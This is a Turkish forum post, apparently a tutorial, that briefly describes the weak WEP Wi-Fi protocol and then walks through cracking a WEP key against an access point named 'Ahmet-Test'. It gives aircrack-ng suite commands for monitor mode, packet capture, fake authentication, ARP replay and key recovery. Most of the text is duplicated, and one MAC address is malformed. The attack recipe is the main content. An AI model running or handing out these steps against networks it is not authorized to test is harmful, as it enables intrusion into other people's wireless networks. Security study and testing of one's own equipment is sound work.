Wi-Fi ağınızın güvenliğini sağlamak için ortaya çıkmış şifreleme yöntemleri vardır,
bu şifreleme yöntemlerinden biri WEP (Wired Equivalent Privacy) dir.
Wired Equivalent Privacy (WEP), dünyada en çok kullanılan Wi-Fi güvenlik
algoritması. Bunun sebebi ise, geriye uyumluluğu ve birçok router’ın kontrol
panelinde ilk sırada yer alması.
WEP 64-bit olarak çıktı fakat sonra 128-bit’e çıkarıldı. Günümüzde 256-bit WEP
şifrelemesi mevcut olsa da, 128-bit şifreleme halen en yaygın olarak kullanılan.
Algoritmadaki bir çok düzeltmeye ve arttırılan anahtar boyutuna rağmen, WEP
standardında zaman içinde birçok güvenlik açığı keşfedildi. Ücretsiz araçlar ile
kolaylıkla kıralabilmeltedir.(Aircrack vb.) WEP 2004 yılında resmi olarak bitirildi.
WEP ağına bağlanılırken aşağıdaki gibi kimlik doğrulama gerçekleşir.
WEP Algoritmasının 3 Önemli Amacı :
WEP Parolasını Ele Geçirme Adımları:
Başlamadan önce;
ifconfig wlan0 ve ya iwconfig komutları ile kablosuz adaptörümüzü görüntüleyebiliriz.
airmon-ng start wlan0 komutu ile adaptörümüzü monitor moda alıyoruz.
airodump-ng wlan0mon komutu ile etraftaki paketleri dinleyerek kablosuz ağlar hakkında bilgi topluyoruz. Yukarıda ki resimde gördüğümüz gibi BSSID, ESSID ve Channel bilgileri görüntülenmektedir.
Terminalimize wifite yazarak aracımızı başka bir aracımızı açıyoruz. WPS ve Clients bilgilerini görebilmekteyiz.
Yukarıda topladığımız bilgilere göre ESSID Ahmet-Test BSSID 3CF:BD:EC:E8:5A olan Channel numarası 10 olan ve WEP protokolünü kullanan erişim noktasını hedef alacağız.
airodump-ng wlan0mon -c 10 –bssid 3CF:BD:EC:E8:5A -w WEP komutu ile Ahmet-Test eişin noktasının paketlerini toplayarak -w parametresi ile bulunduğu dizine kaydetmesini sağlıyoruz.
aireplay-ng -1 1 -a 3CF:BD:EC:E8:5A -h D4:6E:0E:1A:32:26 wlan0mon komutu ile fake authentication oluşturarak daha hızlı bir şekilde paket toplama işlemi gerçekleştireceğiz. -1 ile fake authentication üreteceğimizi aireplay-ng aracına belirttikden sonra kaç saniyede bir gönderileceğini girdik. -a parametresi ile BSSID (Hedef Mac adresini) giriyoruz. -h ile kendi adaptörümüzün mac adresini giriyoruz ve fake authentication paketleri gönderiyoruz.
aireplay-ng -3 -b 3CF:BD:EC:E8:5A -h D4:6E:0E:1A:32:26 wlan0mon komutu ilede IV (Initialization Vector) paketi oluşturmak için ARP paketlerini yakalayıp sürekli olarak tekrarlamaktadır.
aircrack-ng WEP-01.cap komutu ile yeterli sayıda IV (Initialization Vector) paketi toplandığında WEP parolası kırılmaktadır.
bu şifreleme yöntemlerinden biri WEP (Wired Equivalent Privacy) dir.
Wired Equivalent Privacy (WEP), dünyada en çok kullanılan Wi-Fi güvenlik
algoritması. Bunun sebebi ise, geriye uyumluluğu ve birçok router’ın kontrol
panelinde ilk sırada yer alması.
WEP 64-bit olarak çıktı fakat sonra 128-bit’e çıkarıldı. Günümüzde 256-bit WEP
şifrelemesi mevcut olsa da, 128-bit şifreleme halen en yaygın olarak kullanılan.
Algoritmadaki bir çok düzeltmeye ve arttırılan anahtar boyutuna rağmen, WEP
standardında zaman içinde birçok güvenlik açığı keşfedildi. Ücretsiz araçlar ile
kolaylıkla kıralabilmeltedir.(Aircrack vb.) WEP 2004 yılında resmi olarak bitirildi.
WEP ağına bağlanılırken aşağıdaki gibi kimlik doğrulama gerçekleşir.
WEP Algoritmasının 3 Önemli Amacı :
- Kimlik Doğrulama (Authentication)
- Gizlilik (Privacy)
- Bilgi Değiştirme Kontrolu (Message Modification Control)
WEP Parolasını Ele Geçirme Adımları:
Başlamadan önce;
- Kendi cihazımızın MAC adresi = iwconfig ya da ifconfig komutu ile görebilirsiniz.
- BSSID = Hedef Mac Adresi
- ESSID = Hedef Kablosuz Ağ adı
- Channel = Yayın yapılan kanal numarası
ifconfig wlan0 ve ya iwconfig komutları ile kablosuz adaptörümüzü görüntüleyebiliriz.
airmon-ng start wlan0 komutu ile adaptörümüzü monitor moda alıyoruz.
airodump-ng wlan0mon komutu ile etraftaki paketleri dinleyerek kablosuz ağlar hakkında bilgi topluyoruz. Yukarıda ki resimde gördüğümüz gibi BSSID, ESSID ve Channel bilgileri görüntülenmektedir.
Terminalimize wifite yazarak aracımızı başka bir aracımızı açıyoruz. WPS ve Clients bilgilerini görebilmekteyiz.
Yukarıda topladığımız bilgilere göre ESSID Ahmet-Test BSSID 3CF:BD:EC:E8:5A olan Channel numarası 10 olan ve WEP protokolünü kullanan erişim noktasını hedef alacağız.
airodump-ng wlan0mon -c 10 –bssid 3CF:BD:EC:E8:5A -w WEP komutu ile Ahmet-Test eişin noktasının paketlerini toplayarak -w parametresi ile bulunduğu dizine kaydetmesini sağlıyoruz.
aireplay-ng -1 1 -a 3CF:BD:EC:E8:5A -h D4:6E:0E:1A:32:26 wlan0mon komutu ile fake authentication oluşturarak daha hızlı bir şekilde paket toplama işlemi gerçekleştireceğiz. -1 ile fake authentication üreteceğimizi aireplay-ng aracına belirttikden sonra kaç saniyede bir gönderileceğini girdik. -a parametresi ile BSSID (Hedef Mac adresini) giriyoruz. -h ile kendi adaptörümüzün mac adresini giriyoruz ve fake authentication paketleri gönderiyoruz.
aireplay-ng -3 -b 3CF:BD:EC:E8:5A -h D4:6E:0E:1A:32:26 wlan0mon komutu ilede IV (Initialization Vector) paketi oluşturmak için ARP paketlerini yakalayıp sürekli olarak tekrarlamaktadır.
aircrack-ng WEP-01.cap komutu ile yeterli sayıda IV (Initialization Vector) paketi toplandığında WEP parolası kırılmaktadır.
Last edited by a moderator: